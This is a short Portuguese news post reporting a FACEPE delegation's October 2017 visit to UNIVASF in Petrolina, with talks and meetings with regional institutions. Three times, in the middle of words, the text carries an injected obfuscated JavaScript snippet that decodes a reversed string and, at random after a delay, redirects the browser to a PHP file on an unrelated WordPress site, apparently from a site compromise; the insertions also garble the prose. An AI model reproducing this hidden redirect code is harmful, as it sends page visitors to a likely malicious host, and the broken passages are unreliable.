FACEPE visita Petrolina

WhatsApp Image 2017-10-25 at 23.59.24A FACEPE esteve em Petrolina na última semana (19 e 20 de outubro) por convite do Pró-Reitor de Pesquisa, Pós-Graduação e Inovação da UNIVASF (Prof. Jackson Almeida).

No primeiro dia a UNIVASF convidou instituições de ensino e pesquisa da região para assistirem as palestras apresentadas pela FACEPE: “Fomento à Ciência, Tecnologia e Inovação em Pernambuco” apresentada pelo Diretor Científico, Prof. Paulo Cunha e “Programas e Editais da FACEPE” proferida pelo Assessor de Planejamento, Jayme Ribeiro. Após as apresentações houve reunião com as instituições presentes (UNIVASF, EMBRAPA e IF-Sertão PE).

WhatsApp Image 2017-10-19 at 19.09.31

Desde o começo do encontro houve reconhecimento por parte dos pesquisadores da importância da Fundação para o desenvolvimento do interior do estado, particularmente Petrolina e municípios vizinhos (incluindo Juazeiro-BA, onde funcionam as Engenharias da UNIVASF) e, aproveit$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando a ocasião, várias dúvidas sobre o funcionamento da FACEPE no que diz respeito aos seus programas e editais, com foco para as oportunidades existentes para apoio ao interior puderam ser dirimidas.

WhatsApp Image 2017-10-19 at 19.09.00Foi realizado, no dia seguinte, visita às instalações da UNIVASF, acompanhada pelo Prof. Helin$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando Pequeno de Oliveira (Colegiado de Engenharia Elétrica), no Campus Juazeiro, e pelo Prof. Raimundo Campos Palheta Junior (Diretor de Pesquisa), no Campus Ciências Agrárias, qu$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando pode se constatar a importância do apoio da Fundação (e de outros órgãos) ao desenvolvimento científico, tecnológico e de inovação à região.

WhatsApp Image 2017-10-19 at 19.08.53

Em função da exiguidade do tempo, não foi possível visitar outras instituições na região (EMBRAPA, IF-Sertão PE e UPE), prometida em retorno próximo.